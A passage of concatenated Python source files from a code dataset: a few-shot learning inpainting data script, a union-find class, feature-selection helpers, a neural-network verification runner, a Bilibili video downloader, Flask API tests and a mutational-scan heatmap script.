Xt_img_ori = torch.stack(Xt_img_ori, dim=0)\n if use_gpu:\n images_train = images.cuda()\n imgs_gray = imgs_gray.cuda()\n Xt_img_ori = Xt_img_ori.cuda()\n \n with torch.no_grad():\n ytest,feature= model_tradclass(images_train.reshape(1,1,3,84,84), images_train.reshape(1,1,3,84,84),images_train.reshape(1,1,3,84,84), images_train.reshape(1,1,3,84,84)) \n feature_cpu=feature.detach().cpu().numpy()\n probs, idx = ytest.detach().sort(1, True)\n probs = probs.cpu().numpy()\n idx = idx.cpu().numpy() \n #print(pids)\n #print(idx[:,0,0,0])\n #print(idx.shape)\n #exit(0)\n #print(feature.shape)\n #exit(0)\n masks=[]\n edges=[]\n mask_fuse=0\n #output_cam=[]\n for i in range(feature.shape[0]):\n CAMs,masks_cpu=returnCAM(feature_cpu[i], weight_softmax, [idx[i,:4,0,0]],masks)\n #for j in range(4):\n #print(CAMs[j].shape,CAMs[j].max(),CAMs[j].min(),CAMs[j].sum(),feature.shape[0])\n #exit(0)\n masks=CAMs\n for num_mask in range(len(masks_cpu)):\n print(len(masks_cpu))\n #exit(0)\n cv2.imwrite(Paths[num_mask]+'/'+file, masks_cpu[num_mask])\n mask_fuse=masks_cpu[0]/255+masks_cpu[1]/255+masks_cpu[2]/255+masks_cpu[3]/255\n mask_fuse=np.uint8((mask_fuse)>0)*255 \n cv2.imwrite(Paths[4]+'/'+file, mask_fuse)\n #exit(0)\n \n #print(len(masks),masks[0].shape)\n # masks_tensor = torch.stack(masks, dim=0) \n masks_tensor=Funljj.to_tensor(Image.fromarray(mask_fuse)).float().reshape(1,1,84,84)\n #print(mask_tensor.shape)\n #exit(0)\n Xt_masks = masks_tensor.reshape(1,1,1,1,84,84)#[:,:,0]\n Xt_img_ori_repeat=Xt_img_ori.reshape(1,1,1,3,84,84)\n\n Xt_img_ori_repeat = Xt_img_ori_repeat.repeat(1,1,1,1,1,1) \n Xt_img_gray_repeat=imgs_gray.reshape(1,1,1,1,84,84)\n\n Xt_img_gray_repeat = Xt_img_gray_repeat.repeat(1,1,1,1,1,1) \n #print(Xt_img_ori.shape,Xt_masks.shape)\n #exit(0)\n mask_numpy=np.uint8(Xt_masks.numpy()*255)\n print(mask_numpy.shape)\n #exit(0)\n Xt_img_gray_numpy=np.uint8(imgs_gray.cpu().numpy()*255).reshape(1,1,1,84,84)\n #print(Xt_img_gray_numpy.shape)\n for i in range(1):\n for j in range(1):\n for k in range(1):\n edge_PIL=Image.fromarray(load_edge(Xt_img_gray_numpy[i,j,0], mask_numpy[i,j,k,0]))\n print(mask_numpy[i,j,k,0].sum()/255,'llll')\n #exit(0)\n edges.append(Funljj.to_tensor(edge_PIL).float()) \n edges = torch.stack(edges, dim=0) \n edge_sh=edges#.reshape(4,5,1,84,84)\n #print(edge_sh.shape,Xt_img_gray_repeat.shape,masks_tensor.shape)\n #exit(0)\n #exit(0) \n #model_edge.test(Xt_img_ori,edge_sh,Xt_img_gray,Xt_masks)\n with torch.no_grad():\n inpaint_img=model_edge.test(Xt_img_ori_repeat.reshape(1,3,84,84),edge_sh,Xt_img_gray_repeat.reshape(1,1,84,84),masks_tensor)\n inpaint_img_np=inpaint_img.detach().cpu().numpy()\n Xt_img_ori_np=Xt_img_ori_repeat.detach().cpu().numpy() \n #print(inpaint_img_np.shape)\n for id in range(1):\n images_temp_train1=inpaint_img_np[id,:,:]\n Xt_img_ori_repeat1=Xt_img_ori_np.reshape(-1,3,84,84)[id,:,:]\n #print(Xt_img_ori_repeat1.shape)\n #images_temp_train=images_temp_train1*std+mean\n images_ori_train=images_temp_train1.transpose((1,2,0))[:,:,::-1]\n Xt_img_ori_repeat1=Xt_img_ori_repeat1.transpose((1,2,0))[:,:,::-1]\n images_ori_train=np.uint8(images_ori_train*255) \n Xt_img_ori_repeat1=np.uint8(Xt_img_ori_repeat1*255) \n cv2.imwrite(Paths[5]+'/'+file, images_ori_train) \n #cv2.imwrite('./result/inpaint_img/'+str(i)+'_'+str(id)+'_ori.jpg', Xt_img_ori_repeat1) \n exit(0) \n #exit(0) \n #print(path)\n #print(path_1)\n #print(path_2)\n #print(path_3)\n #print(path_4) \n #exit(0) \n for batch_idx, (images_train, labels_train,tpids,Xt_img_ori,Xt_img_gray,images_test, labels_test, pids) in enumerate(trainloader):\n \n #for batch_idx, (images_train, labels_train, images_test, labels_test, pids) in enumerate(trainloader): \n data_time.update(time.time() - end)\n #print(Xt_img_ori.shape,Xt_img_gray.shape,images_train.shape,'lll')\n edges=[]\n if use_gpu:\n images_train = images_train.cuda()\n\n batch_size, num_train_examples, channels, height, width = images_train.size()\n num_test_examples = images_test.size(1)\n \n labels_train_1hot = one_hot(labels_train).cuda()\n labels_train_1hot_4 = one_hot(labels_train_4).cuda() \n #labels_train = labels_train.view(batch_size * num_train_examples) \n #print( labels_train)\n #exit(0) \n labels_test_1hot = one_hot(labels_test).cuda()\n labels_test_1hot_4 = one_hot(labels_test_4).cuda()\n #print(labels_test_1hot_4.shape,labels_test_1hot.shape) \n #labels_test_1hot_4 = torch.cat((labels_test_1hot , labels_test_1hot_4), 1)\n #print(labels_test_1hot.shape,labels_test_1hot_4.shape)\n #exit(0)\n with torch.no_grad():\n ytest,feature= model_tradclass(images_train, images_train, labels_train_1hot, labels_test_1hot)\n #print(ytest.shape)\n #exit(0)\n images_train=images_train.reshape(4,5,1,3,84,84)\n #images_test=images_test.reshape(4,30,1,3,84,84) \n feature_cpu=feature.detach().cpu().numpy()\n probs, idx = ytest.detach().sort(1, True)\n probs = probs.cpu().numpy()\n idx = idx.cpu().numpy() \n #print(pids)\n #print(idx[:,0,0,0])\n #print(idx.shape)\n #exit(0)\n #print(feature.shape)\n #exit(0)\n masks=[]\n #output_cam=[]\n for i in range(feature.shape[0]):\n CAMs=returnCAM(feature_cpu[i], weight_softmax, [idx[i,:4,0,0]],masks)\n masks=CAMs\n #print(len(masks),masks[0].shape)\n masks_tensor = torch.stack(masks, dim=0)\n Xt_masks = masks_tensor.reshape(1,1,4,1,84,84)#[:,:,0]\n Xt_img_ori_repeat=Xt_img_ori.reshape(1,1,1,3,84,84)\n\n Xt_img_ori_repeat = Xt_img_ori_repeat.repeat(1,1,4,1,1,1) \n Xt_img_gray_repeat=Xt_img_gray.reshape(1,1,1,1,84,84)\n\n Xt_img_gray_repeat = Xt_img_gray_repeat.repeat(1,1,4,1,1,1) \n #print(Xt_img_ori.shape,Xt_masks.shape)\n #exit(0)\n mask_numpy=np.uint8(Xt_masks.numpy()*255)\n #print(mask_numpy.shape,Xt_img_gray_numpy.shape)\n Xt_img_gray_numpy=np.uint8(Xt_img_gray.numpy()*255)\n #print(Xt_img_gray_numpy.shape)\n for i in range(1):\n for j in range(1):\n for k in range(4):\n edge_PIL=Image.fromarray(load_edge(Xt_img_gray_numpy[i,j,0], mask_numpy[i,j,k,0]))\n edges.append(Funljj.to_tensor(edge_PIL).float()) \n edges = torch.stack(edges, dim=0) \n edge_sh=edges#.reshape(4,5,1,84,84)\n #exit(0) \n #model_edge.test(Xt_img_ori,edge_sh,Xt_img_gray,Xt_masks)\n with torch.no_grad():\n inpaint_img=model_edge.test(Xt_img_ori_repeat.reshape(4,3,84,84),edge_sh,Xt_img_gray_repeat.reshape(4,1,84,84),masks_tensor)\n inpaint_img_np=inpaint_img.detach().cpu().numpy()\n for i in range(4):\n images_temp_train1=inpaint_img_np[i,:,:].cpu().numpy()\n #images_temp_train=images_temp_train1*std+mean\n images_ori_train=images_temp_train1.transpose((1,2,0))[:,:,::-1]\n images_ori_train=np.uint8(images_ori_train*255) \n cv2.imwrite('./result/inpaint_img/'+str(i)+'_'+str(j)+'_'+str(labels_train_ex[i,j])+'.jpg', images_ori_train) \n exit(0)\n inpaint_img_np=(inpaint_img_np-mean)/std\n #support set\n inpaint_tensor=torch.from_numpy(inpaint_img_np).cuda().reshape(4,5,4,3,84,84).float() \n #images_train=torch.cat((images_train, inpaint_tensor), 2).reshape(4,25,3,84,84)#images_train\ndef test(model_edge, model, model_tradclass,weight_softmax, testloader, use_gpu):\n accs = AverageMeter()\n test_accuracies = []\n std=np.expand_dims(np.array([0.229, 0.224, 0.225]),axis=1)\n std=np.expand_dims(std,axis=2) \n mean=np.expand_dims(np.array([0.485, 0.456, 0.406]),axis=1) \n mean=np.expand_dims(mean,axis=2) \n model.eval()\n model_tradclass.eval()\n with torch.no_grad():\n for batch_idx , (images_train, labels_train,Xt_img_ori,Xt_img_gray, images_test, labels_test) in enumerate(testloader):\n if use_gpu:\n images_train = images_train.cuda()\n images_test = images_test.cuda()\n\n end = time.time()\n #print(images_train.shape,images_test.shape)\n #exit(0)\n batch_size, num_train_examples, channels, height, width = images_train.size()\n num_test_examples = images_test.size(1)\n labels_train_4 = labels_train.reshape(4,5,1)#[:,:,0]\n\n labels_train_4 = labels_train_4.repeat(1,1,5).reshape(4,-1) \n labels_train_4=labels_train_4.cuda() \n labels_train_1hot = one_hot(labels_train).cuda()\n labels_test_1hot = one_hot(labels_test).cuda()\n labels_train_1hot_4 = one_hot(labels_train_4).cuda() \n ytest,feature= model_tradclass(images_train, images_train, labels_train_1hot, labels_test_1hot)\n #print(ytest.shape)\n #exit(0)\n images_train=images_train.reshape(4,5,1,3,84,84)\n feature_cpu=feature.detach().cpu().numpy()\n probs, idx = ytest.detach().sort(1, True)\n probs = probs.cpu().numpy()\n idx = idx.cpu().numpy() \n #print(pids)\n #print(idx[:,0,0,0])\n #print(idx.shape)\n #exit(0)\n #print(feature.shape)\n #exit(0)\n masks=[]\n #output_cam=[]\n for i in range(feature.shape[0]):\n CAMs=returnCAM(feature_cpu[i], weight_softmax, [idx[i,:4,0,0]],masks)\n masks=CAMs\n #print(len(masks),masks[0].shape)\n masks_tensor = torch.stack(masks, dim=0)\n Xt_masks = masks_tensor.reshape(4,5,4,1,84,84)#[:,:,0]\n Xt_img_ori_repeat=Xt_img_ori.reshape(4,5,1,3,84,84)\n\n Xt_img_ori_repeat = Xt_img_ori_repeat.repeat(1,1,4,1,1,1) \n Xt_img_gray_repeat=Xt_img_gray.reshape(4,5,1,1,84,84)\n\n Xt_img_gray_repeat = Xt_img_gray_repeat.repeat(1,1,4,1,1,1) \n #print(Xt_img_ori.shape,Xt_masks.shape)\n #exit(0)\n edges=[]\n mask_numpy=np.uint8(Xt_masks.numpy()*255)\n #print(mask_numpy.shape,Xt_img_gray_numpy.shape)\n Xt_img_gray_numpy=np.uint8(Xt_img_gray.numpy()*255)\n #print(Xt_img_gray_numpy.shape)\n for i in range(4):\n for j in range(5):\n for k in range(4):\n edge_PIL=Image.fromarray(load_edge(Xt_img_gray_numpy[i,j,0], mask_numpy[i,j,k,0]))\n edges.append(Funljj.to_tensor(edge_PIL).float()) \n edges = torch.stack(edges, dim=0) \n edge_sh=edges#.reshape(4,5,1,84,84)\n #exit(0) \n #model_edge.test(Xt_img_ori,edge_sh,Xt_img_gray,Xt_masks)\n inpaint_img=model_edge.test(Xt_img_ori_repeat.reshape(80,3,84,84),edge_sh,Xt_img_gray_repeat.reshape(80,1,84,84),masks_tensor)\n inpaint_img_np=inpaint_img.detach().cpu().numpy()\n inpaint_img_np=(inpaint_img_np-mean)/std\n inpaint_tensor=torch.from_numpy(inpaint_img_np).cuda().reshape(4,5,4,3,84,84).float()\n images_train=torch.cat((images_train, inpaint_tensor), 2).reshape(4,25,3,84,84)\n cls_scores = model(images_train, images_test, labels_train_1hot_4, labels_test_1hot)\n cls_scores = cls_scores.view(batch_size * num_test_examples, -1)\n labels_test = labels_test.view(batch_size * num_test_examples)\n\n _, preds = torch.max(cls_scores.detach().cpu(), 1)\n acc = (torch.sum(preds == labels_test.detach().cpu()).float()) / labels_test.size(0)\n accs.update(acc.item(), labels_test.size(0))\n\n gt = (preds == labels_test.detach().cpu()).float()\n gt = gt.view(batch_size, num_test_examples).numpy() #[b, n]\n acc = np.sum(gt, 1) / num_test_examples\n acc = np.reshape(acc, (batch_size))\n test_accuracies.append(acc)\n\n accuracy = accs.avg\n test_accuracies = np.array(test_accuracies)\n test_accuracies = np.reshape(test_accuracies, -1)\n stds = np.std(test_accuracies, 0)\n ci95 = 1.96 * stds / np.sqrt(args.epoch_size)\n print('Accuracy: {:.2%}, std: :{:.2%}'.format(accuracy, ci95))\n\n return accuracy\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"create_pureinpainting_data.py","file_name":"create_pureinpainting_data.py","file_ext":"py","file_size_in_byte":29927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"238618375","text":"class unionFind:\n '''\n 并查集,用数组模拟树结构,应用动态连通性问题\n '''\n def __init__(self, n):\n '''\n 初始化并查集,n代表结点数\n '''\n self.count = n # 连通分量\n self.parent = [i for i in range(n)] # 数组模拟的树,存放对应结点的父结点\n self.size = [1 for _ in range(n)] # 以结点为根结点的树的大小,用来平衡树\n \n def find(self, p):\n '''\n 寻找结点p的根结点\n '''\n while self.parent[p] != p:\n # 顺便对树进行路径压缩\n self.parent[p] = self.parent[self.parent[p]]\n p = self.parent[p]\n return p\n\n def union(self, p, q):\n '''\n 连接结点p, q\n '''\n rootP = self.find(p)\n rootQ = self.find(q)\n if rootP == rootQ:\n # p, q 的根结点相同,代表已连通,无需操作\n return\n \n # 为使树平衡,尽量将小的树合并到大的树下\n if self.size[rootP] >= self.size[rootQ]:\n self.parent[rootQ] = rootP\n self.size[rootP] += self.size[rootQ]\n else:\n self.parent[rootP] = rootQ\n self.size[rootQ] += self.size[rootP]\n \n self.count -= 1\n \n def connected(self, p, q):\n '''\n 判断结点p, q是否连接\n '''\n return self.find(p) == self.find(q)\n \n def getCount(self):\n '''\n 返回连通分量\n '''\n return self.count\n\n\nif __name__ == \"__main__\":\n uf = unionFind(10)\n print(uf.getCount())\n\n uf.union(0, 3)\n uf.union(1, 3)\n print(uf.connected(0, 3), uf.getCount(), uf.connected(0, 9))","sub_path":"union_find/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"294333544","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 30 23:08:11 2020\n\n@author: kleber\n\"\"\"\n\n\n\nusuario = input(\"Digite o usuário do sistema: \")\n\nif(usuario == \"Flavio\"):{\n print(\"Bem vindo Flavio!\")\n }\nelif(usuario == \"Douglas\"):{\n print(\"Bem vindo Douglas\")\n }\nelif(usuario == \"Nico\"):{\n print(\"Bem vindo Nico\")\n }\nelse:\n print(\"Usuário não encontrado!\")","sub_path":"testeAdv.py","file_name":"testeAdv.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126773048","text":"from sklearn.linear_model import RandomizedLogisticRegression\r\nfrom sklearn.feature_selection import VarianceThreshold, chi2, f_classif\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom minepy import MINE\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\n\r\ndef make_df(train_set):\r\n train_features = []\r\n c = []\r\n for img_ki67 in train_set:\r\n feature = img_ki67.get_vgg_feature()\r\n categry = img_ki67.get_class()\r\n c.append([categry])\r\n train_features.append(feature)\r\n feature_len = train_features[0].size\r\n df_names = []\r\n for i in range(feature_len):\r\n df_names.append(\"%d\" % i)\r\n features_df = pd.DataFrame(data=train_features, columns=df_names)\r\n c = np.array(c)\r\n return features_df, c\r\n\r\n\r\ndef remove_low_var(train_x, threshold=1e-4):\r\n '''\r\n\r\n :param train_x: numpy array of shape [n_samples, n_features]\r\n :param threshold: variance\r\n :return: high variance feature indices,variances\r\n '''\r\n vt = VarianceThreshold(threshold=threshold)\r\n high_var_x = vt.fit_transform(train_x)\r\n supports = vt.get_support(indices=True).tolist()\r\n return supports, high_var_x\r\n\r\n\r\ndef pearson(train_x, train_y):\r\n '''\r\n\r\n :param train_x: {array-like, sparse matrix} shape = [n_samples, n_features]\r\n :param train_y: array of shape(n_samples)\r\n :return: F : array, shape = [n_features,]\r\n pval : array, shape = [n_features,]\r\n '''\r\n\r\n F, pval = f_classif(train_x, train_y)\r\n print(F)\r\n print(pval)\r\n\r\n\r\ndef chi2_test(train_x, train_y):\r\n '''\r\n\r\n :param train_x: {array-like, sparse matrix}, shape = (n_samples, n_features_in)\r\n :param train_y: array-like, shape = (n_samples,)\r\n :return: chi2 : array, shape = (n_features,)\r\n pval : array, shape = (n_features,)\r\n '''\r\n\r\n c, pval = chi2(train_x, train_y)\r\n print(c)\r\n\r\n\r\ndef mic(train_x, train_y):\r\n '''\r\n\r\n :param train_x: {array-like, sparse matrix}, shape = (n_samples, n_features)\r\n :param train_y: array-like, shape = (n_samples,)\r\n :return: mic: float\r\n '''\r\n m = MINE()\r\n scores = []\r\n for i in range(train_x.shape[1]):\r\n m.compute_score(train_x[:, i], train_y[:, 0])\r\n score = m.mic()\r\n scores.append((i, score))\r\n return scores\r\n\r\n\r\ndef rf_selection(train_x, train_y, num_trees, depth):\r\n rf = RandomForestClassifier(n_estimators=num_trees, criterion=\"entropy\", max_depth=depth)\r\n rf.fit(train_x,train_y)\r\n print(rf.feature_importances_)\r\n\r\n\r\ndef stability(train_x, train_y, C=1, n_resampling=200, selection_threshold=0.15):\r\n rlog = RandomizedLogisticRegression(C=C, n_resampling=n_resampling, selection_threshold=selection_threshold)\r\n rlog.fit(train_x, train_y[:, 0])\r\n return rlog.scores_\r\n\r\n\r\ndef feature_selection(features, target, feature_num=400, threshold=1e-4, C=1, n_resampling=200,\r\n selection_threshold=0.15):\r\n # high_var_indices, _ = remove_low_var(features.values, threshold=threshold)\r\n # features_high_var = features.ix[:, high_var_indices]\r\n mic_scores = mic(features.values, target)\r\n mic_scores.sort(key=lambda score: score[1], reverse=True)\r\n mic_indices = []\r\n for i in range(feature_num):\r\n mic_indices.append(mic_scores[i][0])\r\n features_mic = features.ix[:, mic_indices]\r\n # rlog_scores = stability(features_mic.values, target, C=C, n_resampling=n_resampling,\r\n # selection_threshold=selection_threshold)\r\n # rlog_indices = []\r\n # for i, score in enumerate(rlog_scores):\r\n # if score != 0:\r\n # rlog_indices.append(i)\r\n # features_rlog = features_mic.ix[:, rlog_indices]\r\n # features_result = [int(x) for x in features_rlog.columns.tolist()]\r\n features_result = [int(x) for x in features_mic.columns.tolist()]\r\n return features_result\r\n","sub_path":"utils/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"574579083","text":"#!/usr/bin/env python\nimport argparse\n\nfrom plnn.relu_branch_and_bound import relu_bab\nfrom plnn.network_linear_approximation import AssumptionLinearizedNetwork\nfrom plnn.model import load_and_simplify\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Read a .rlv file\"\n \"and prove its property.\")\n parser.add_argument('rlv_infile', type=argparse.FileType('r'),\n help='.rlv file to prove.')\n args = parser.parse_args()\n\n network, domain = load_and_simplify(args.rlv_infile,\n AssumptionLinearizedNetwork)\n\n epsilon = 0\n decision_bound = 0\n min_lb, min_ub, ub_point, nb_visited_states = relu_bab(network, domain,\n epsilon, decision_bound)\n\n if min_lb >= 0:\n print(\"UNSAT\")\n elif min_ub < 0:\n # Verify that it is a valid solution\n candidate_ctx = ub_point.view(1,-1)\n val = network.net(candidate_ctx)\n margin = val.squeeze().item()\n if margin > 0:\n print(\"Error\")\n else:\n print(\"SAT\")\n print(ub_point)\n print(margin)\n else:\n print(\"Unknown\")\n print(f\"Nb states visited: {nb_visited_states}\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/relubab_runner.py","file_name":"relubab_runner.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"164053243","text":"'''\n利用you-get下载b战视频\n首先通过火狐浏览器获得每一页的json文件 其中包括了每个视频的详细url地址\nhttps://api.bilibili.com/x/web-interface/search/type?jsonp=jsonp&search_type=video&highlight=1&keyword=%E8%A7%86%E9%A2%91&from_source=banner_search&spm_id_from=333.334.b_62616e6e65725f6c696e6b.2&page=2&single_column=0&callback=__jp0\n最后一个参数没用 删除\nhttps://api.bilibili.com/x/web-interface/search/type?jsonp=jsonp&search_type=video&highlight=1&keyword=%E8%A7%86%E9%A2%91&from_source=banner_search&spm_id_from=333.334.b_62616e6e65725f6c696e6b.2&page=2&single_column=0\n'''\nimport requests\nimport os\n\ndef get_json(page):\n url = \"https://api.bilibili.com/x/web-interface/search/type?jsonp=jsonp&search_type=video&highlight=1&keyword=%E8%A7%86%E9%A2%91&from_source=banner_search&spm_id_from=333.334.b_62616e6e65725f6c696e6b.2&page={}&single_column=0\".format(page)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36,h\"\n }\n rsp = requests.get(url=url, headers=headers)\n # rsp.encoding = rsp.apparent_encoding\n datas = rsp.json()\n dt = []\n for data in datas[\"data\"][\"result\"]:\n dt.append((data[\"title\"], data[\"arcurl\"]))\n # print(dt)\n return dt\ndef down_load(data):\n path = r\"G:\\Git_Repository\\spider\\习题班\\数据存储\\bili_video\"\n if not os.path.exists(path):\n os.mkdir(path)\n for title, url in data:\n filename = path + \"\\\\\" + title\n print(\"正在下载{}\".format(title))\n os.system(\"you-get -o {} {}\".format(filename, url))\n print(\"下载完成{}\".format(title))\n\nif __name__ == '__main__':\n for page in range(1,2):\n data = get_json(page)\n down_load(data)","sub_path":"xitiban/数据存储/bilibili_you_get.py","file_name":"bilibili_you_get.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"609039739","text":"\"\"\"Testing resources.\"\"\"\nfrom unittest import main\n\nfrom flask_testing import TestCase\n\nfrom fields_service import APP\nfrom fields_service.config.test_config import TestingConfig\nfrom fields_service.db import DB\nfrom fields_service.models.choice import Choice\nfrom fields_service.models.field import Field\n\n\ndef create_app(config_obj):\n \"\"\"\n Creates testing app.\n param: config_obj: object with configuration.\n :return: flask app.\n \"\"\"\n app = APP\n app.config.from_object(config_obj)\n return app\n\n\nclass MyTestCase(TestCase):\n\n \"\"\"Tests for get, put, delete resources.\"\"\"\n\n def create_app(self):\n \"\"\":returns flask app.\"\"\"\n return create_app(TestingConfig)\n\n def setUp(self):\n \"\"\"Creates tables and puts objects into database.\"\"\"\n DB.create_all()\n field = Field(has_autocomplete=True, has_choice=True,\n title=\"edu\", is_multichoice=True)\n DB.session.add(field)\n DB.session.commit()\n field = Field.query.filter_by(has_autocomplete=True, has_choice=True,\n title=\"edu\", is_multichoice=True).first()\n self.field_id = field.id\n choice1 = Choice(title=\"LNU\", field_id=self.field_id)\n choice2 = Choice(title=\"LP\", field_id=self.field_id)\n DB.session.add(choice1)\n DB.session.add(choice2)\n DB.session.commit()\n id1 = Choice.query.filter_by(field_id=self.field_id, title=\"LNU\").first()\n self.choice_id1 = id1.id\n id2 = Choice.query.filter_by(field_id=self.field_id, title=\"LP\").first()\n self.choice_id2 = id2.id\n\n def tearDown(self):\n \"\"\"Drops all tables.\"\"\"\n DB.session.remove()\n DB.drop_all()\n\n def test_get(self):\n \"\"\"Tests get resource.\"\"\"\n with self.create_app().test_client() as client:\n response = client.get('/field/{}'.format(self.field_id))\n check = {\n \"has_autocomplete\": True,\n \"has_choice\": True,\n \"title\": \"edu\",\n \"is_multichoice\": True,\n \"id\": self.field_id,\n \"choices\": [\n {\n \"id\": self.choice_id1,\n \"title\": \"LNU\",\n \"field_id\": self.field_id\n },\n {\n \"id\": self.choice_id2,\n \"title\": \"LP\",\n \"field_id\": self.field_id\n }\n ]\n }\n self.assertEqual(response.json, check)\n\n def test_put(self):\n \"\"\"Tests put resource.\"\"\"\n with self.create_app().test_client() as client:\n new = {\n \"has_autocomplete\": True,\n \"has_choice\": True,\n \"title\": \"edu\",\n \"is_multichoice\": False,\n \"choices\": [\n {\n \"title\": \"LNU\"\n },\n {\n \"title\": \"LP\"\n }\n ]\n }\n client.put('/field/{}'.format(self.field_id), json=new)\n field = Field.query.filter_by(id=self.field_id).first()\n self.assertEqual(field.is_multichoice, False)\n\n def test_delete(self):\n \"\"\"Tests delete resource.\"\"\"\n with self.create_app().test_client() as client:\n response = client.delete('/field/{}'.format(self.field_id))\n field = Field.query.filter_by(id=self.field_id).first()\n choice1 = Choice.query.filter_by(id=self.choice_id1).first()\n choice2 = Choice.query.filter_by(id=self.choice_id2).first()\n self.assertEqual(field, None)\n self.assertEqual(choice1, None)\n self.assertEqual(choice2, None)\n self.assertEqual(response.status_code, 200)\n\n\nclass PostTest(TestCase):\n\n \"\"\"Tests for post resource.\"\"\"\n\n def create_app(self):\n \"\"\":returns flask app.\"\"\"\n return create_app(TestingConfig)\n\n def setUp(self):\n \"\"\"Creates tables.\"\"\"\n DB.create_all()\n\n def test_post_success(self):\n \"\"\"Tests post resource success.\"\"\"\n with self.create_app().test_client() as client:\n response = client.post('/field',\n json={\"has_autocomplete\": True, \"has_choice\": False,\n \"title\": \"edu\", \"is_multichoice\": True})\n self.assertEqual(response.status_code, 200)\n\n def tearDown(self):\n \"\"\"Drops all tables.\"\"\"\n DB.session.remove()\n DB.drop_all()\n\n\nclass GetTitlesTest(TestCase):\n\n \"\"\"Tests for post resource.\"\"\"\n\n def create_app(self):\n \"\"\":returns flask app.\"\"\"\n return create_app(TestingConfig)\n\n def setUp(self):\n \"\"\"Creates tables.\"\"\"\n DB.create_all()\n field1 = Field(has_autocomplete=True, has_choice=False,\n title=\"edu\", is_multichoice=True)\n field2 = Field(has_autocomplete=True, has_choice=False,\n title=\"name\", is_multichoice=True)\n DB.session.add(field1)\n DB.session.add(field2)\n DB.session.commit()\n\n def test_get(self):\n \"\"\"Tests PostAPI get method.\"\"\"\n with self.create_app().test_client() as client:\n response = client.get('/field?field_id=1&field_id=2',)\n check = {\"1\": \"edu\", \"2\": \"name\"}\n self.assertEqual(response.json, check)\n\n def tearDown(self):\n \"\"\"Drops all tables.\"\"\"\n DB.session.remove()\n DB.drop_all()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fields_service/tests/test_flask_app.py","file_name":"test_flask_app.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"264465714","text":"#!/usr/bin/env python \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import DivergingNorm\n\n__aa_seq__ = (\"LRLEVKLGQGCFGEVWMGTWNGTTRVAIKTLKPGTMSPEAFLQEAQVMKKLRHEKLVQLYAVVSEEPIYIVTEYMSKGSLLDFLKGETGKYLRLPQLVDMAAQIASGMAYVERMNYVHRDLRAANILVGENLVCKVADFGLARLIEDNEYTARQGAKFPIKWTAPEAALYGRFTIKSDVWSFGILLTELTTKGRVPYPGMVNREVLDQVERGYRMPCPPECPESLHDLMCQCWRKEPEERPTFEYLQAFL\")\n__cd_pos__ = np.arange(270, 520)\n__aa_key__ = {\n 'His' : 'H',\n 'Lys' : 'K',\n 'Arg' : 'R',\n 'Asp' : 'D',\n 'Glu' : 'E',\n 'Cys' : 'C',\n 'Met' : 'M',\n 'Asn' : 'N',\n 'Gln' : 'Q',\n 'Ser' : 'S',\n 'Thr' : 'T',\n 'Ala' : 'A',\n 'Ile' : 'I',\n 'Leu' : 'L',\n 'Val' : 'V',\n 'Phe' : 'F',\n 'Trp' : 'W',\n 'Tyr' : 'Y',\n 'Gly' : 'G',\n 'Pro' : 'P',\n 'Ter' : '*'\n \n}\n__pos_idx_dict__ = dict(zip(__cd_pos__, np.arange(len(__cd_pos__))))\n__aa_idx_dict__ = dict(zip(list(__aa_key__.values()), np.arange(len(__aa_key__))))\n\n\ndef create_variant_index(df):\n \"\"\"\n Create variant index from DataFrame with index in hgvs format.\n \n Args:\n df: DataFrame with index in hgvs format\n Returns:\n variant_index: variant in [1 letter WTAA][position][1 letter MutAA]\n format, maintaining original order (list)\n \n \"\"\"\n \n # Grab original hgvs undex\n variant_index = df.index.tolist()\n \n # Loop through all variants\n for idx, variant in enumerate(variant_index):\n \n # Skip _sy and _wt variants\n if 'p.' not in variant:\n continue\n\n # Get WT, mutant identities and position\n wt_aa = variant[2:5]\n pos = variant[5:-3]\n mut_aa = variant[-3:]\n\n # Create shortened form\n variant_shortened = __aa_key__[wt_aa] + str(pos) + __aa_key__[mut_aa]\n\n # Reassign value\n variant_index[idx] = variant_shortened\n \n return(variant_index)\n\n\ndef create_heatmap_arr(scores, variant_index):\n \"\"\"\n Create heatmap from given scores.\n \n Args:\n scores: scores in order of variant_index (np array)\n variant_index: order of variants in the format \n [1 letter WTAA][position][1 letter MutAA] (list)\n Returns:\n heatmap_arr: 2D array where positions=rows, aas=cols\n \n \"\"\"\n \n # Create empty array for storing values\n heatmap_arr = np.empty((len(__pos_idx_dict__), len(__aa_idx_dict__)))\n heatmap_arr[:] = np.nan\n \n # Loop through individual variants\n for variant, score in zip(variant_index, scores):\n\n # Skip \"_wt\" and \"_sy\" rows\n if len(variant) < 5:\n continue\n\n # Collect wt, mutant, and position data from variant_index\n wt_aa = variant[0]\n pos = variant[1:-1]\n mut_aa = variant[-1]\n\n # Assign score to heatmap array\n row_idx = __pos_idx_dict__[int(pos)]\n col_idx = __aa_idx_dict__[mut_aa]\n heatmap_arr[row_idx, col_idx] = score\n \n return(heatmap_arr)\n\n\ndef plot_heatmap(heatmap, title):\n \"\"\"\n Plot heatmap.\n 